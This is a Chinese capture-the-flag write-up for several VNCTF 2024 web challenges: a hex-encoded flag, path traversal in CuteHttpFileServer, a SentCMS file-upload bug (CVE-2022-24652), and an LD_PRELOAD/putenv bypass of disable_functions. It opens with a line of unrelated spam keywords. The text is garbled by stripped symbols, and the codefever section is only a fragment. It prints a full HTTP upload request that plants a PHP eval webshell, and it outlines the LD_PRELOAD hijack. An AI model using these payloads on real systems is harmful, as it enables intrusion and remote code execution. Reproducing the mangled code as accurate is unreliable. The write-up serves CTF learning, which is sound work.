企业网站策划书1000字,南充建设工程信息网,ui设计公司哪家好,旅游网站建设初衷Checkin
题目描述#xff1a;Welcome to VNCTF 2024~ long time no see.
开题#xff0c;是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath
题目描述#xff1a;源自一次现实渗透
开题 当前页面没啥好看的#xff0c;先爆破密码登录试试。爆破无果…Checkin
题目描述Welcome to VNCTF 2024~ long time no see.
开题是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath
题目描述源自一次现实渗透
开题 当前页面没啥好看的先爆破密码登录试试。爆破无果。。。
在项目的github仓库中的issues发现了别人提出的安全性问题目录穿越
安全性问题 · Issue #15 · ods-im/CuteHttpFileServer · GitHub 确实可行发现一个文件名为base64编码的文件。 解码后是账号密码即可登录。 目录穿越找到flag位置 重命名用目录穿越将文件移到可下载目录下。 点开就是flag TrySent
考点总结CVE-2022-24652文件上传漏洞
题目描述Just TrySent出错不影响解题。 后台管理是thinkphp的但是工具没检测出漏洞。 登陆后界面如下上传头像功能值得引起注意 这其实就是CVE-2022-24652危险类型文件的不加限制上传是文件上传漏洞。漏洞路由/user/upload/upload
参考文章
阿里云漏洞库 (aliyun.com)
CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库
Sentcms任意文件上传漏洞 | Hanayuzu’Blog 抓包上传文件由于没有上传文件按钮我们手动构建上传包。
修改包
POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9
Cookie: PHPSESSIDbdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; nameidWU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namenametest.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; nametypeimage/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namelastModifiedDateWed Jul 21 2021 18:15:25 GMT0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namesize164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; namefile; filenameshell.php
Content-Type: image/jpegJay17
?php eval($_POST[1]);?------WebKitFormBoundaryrhx2kYAMYDqoTThz-- 访问呢恶意文件getshell codefever_again【*】
题目描述非常好代码爱来自审计codefever 最新
开题 先注册账号试试
givenphp【*】
考点总结LD_PRELOAD putenv()劫持共享so绕过LD_PRELOAD劫持ld劫持
题目描述非常好题目爱来自白给
直接给了源码
?php
highlight_file(__FILE__);
if(isset($_POST[upload])){handleFileUpload($_FILES[file]);
}if(isset($_GET[challenge])){waf();$value$_GET[value];$key$_GET[key];$funccreate_function(,putenv($key$value););if($func$_GET[guess]){$func();system(whoami);}
}
function waf()
{if(preg_match(/\||%|\(|\)|;|bash/i,$_GET[key])||preg_match(/\||%|\(|\)|;|bash/i,$_GET[value])){die(evil input!!!);}
}
function handleFileUpload($file)
{$uploadDirectory /tmp/;if ($file[error] ! UPLOAD_ERR_OK) {echo 文件上传失败。;return;}$fileExtension pathinfo($file[name], PATHINFO_EXTENSION);$newFileName uniqid(uploaded_file_, true) . . . $fileExtension;$destination $uploadDirectory . $newFileName;if (move_uploaded_file($file[tmp_name], $destination)) {echo $destination;} else {echo 文件移动失败。;}
}题目有两个功能一个是文件上传还有一个是环境变量修改。过滤死了不能直接环境变量注入。
有文件上传有环境变量修改就是LD_PRELOAD劫持ld劫持。这个方法用在disable_functions的手动绕过中也就是LD_PRELOAD putenv()劫持共享so绕过。